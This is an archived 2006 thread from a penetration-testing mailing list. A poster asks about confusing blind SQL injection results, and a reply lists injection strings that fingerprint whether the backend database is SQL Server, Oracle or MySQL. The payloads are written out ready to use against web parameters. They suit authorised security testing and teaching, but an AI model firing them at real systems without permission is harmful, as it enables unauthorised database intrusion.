RE: SQL injection (or not?)

From: C, Muruganandam (muruganandam.c@genpact.com)
Date: Mon Aug 14 2006 - 13:16:48 EDT

Any other guide for sqlinjection?

-----Original Message-----
From: Isidro Ramon Labrador Rodriguez [mailto:irlabrador@sgi.es]
Sent: Wednesday, August 09, 2006 3:32 PM
To: pen-test@securityfocus.com
Subject: RE: SQL injection (or not?)

When I find a Blind SQL Vulnerability and I want to guess the Databsee
which is behind I try the following injections:

Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a

If it returns a valid value the database is SQL Server

Parameter=[valid value]' and exists(select * from user_tables) and
'a'='a
 
If it returns a valid value the database is Oracle

Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a

 
If it returns a valid value the database is MySQL

I hope it helps.

Best Regards,
Isidro

-----Mensaje original-----
De: rr@neo.dtcom.lv [mailto:rr@neo.dtcom.lv]
Enviado el: martes, 08 de agosto de 2006 11:19
Para: pen-test@securityfocus.com
Asunto: SQL injection (or not?)

Hi.

I'm having weird situation with sql injection (I guess). Unfortunately
there is no error message displayed - blind injection, so all that I
know - query is valid or not.

script.aspx?parameter=' and 'a'%2b'a'='aa no result, aparently query is
invalid, so it is not MSSQL, kind of

script.aspx?parameter=' and concat('a','a')='aa returns page, sql query
turns out to be valid, MySQL??

meanwhile
script.aspx?parameter=' and concat('a','a','a')='aaa no result, so it is
not MySQL

also I know that database should be MSSQL

concat is first function I found to work. Maybe it is not sql injection?
What else could it be?

rr

------------------------------------------------------------------------
------
This List Sponsored by: Cenzic

Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the
Analyst's Choice Award from eWeek. As attacks through web applications
continue to rise, you need to proactively protect your applications from
hackers. Cenzic has the most comprehensive solutions to meet your
application security penetration testing and vulnerability management
needs. You have an option to go with a managed service (Cenzic
ClickToSecure) or an enterprise software (Cenzic Hailstorm). Download
FREE whitepaper on how a managed service can help you:
http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm
your results from other product. Contact us at request@cenzic.com for
details.
------------------------------------------------------------------------
------

______________________
Este mensaje, y en su caso, cualquier fichero anexo al mismo,
 puede contener informacion clasificada por su emisor como confidencial
 en el marco de su Sistema de Gestion de Seguridad de la
Informacion siendo para uso exclusivo del destinatario, quedando
prohibida su divulgacion copia o distribucion a terceros sin la
autorizacion expresa del remitente. Si Vd. ha recibido este mensaje
 erroneamente, se ruega lo notifique al remitente y proceda a su borrado.
Gracias por su colaboracion.
______________________
This message including any attachments may contain confidential
information, according to our Information Security Management System,
 and intended solely for a specific individual to whom they are addressed.
 Any unauthorised copy, disclosure or distribution of this message
 is strictly forbidden. If you have received this transmission in error,
 please notify the sender immediately and delete it.
______________________

------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------

------------------------------------------------------------------------------
This List Sponsored by: Cenzic

Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:42 EDT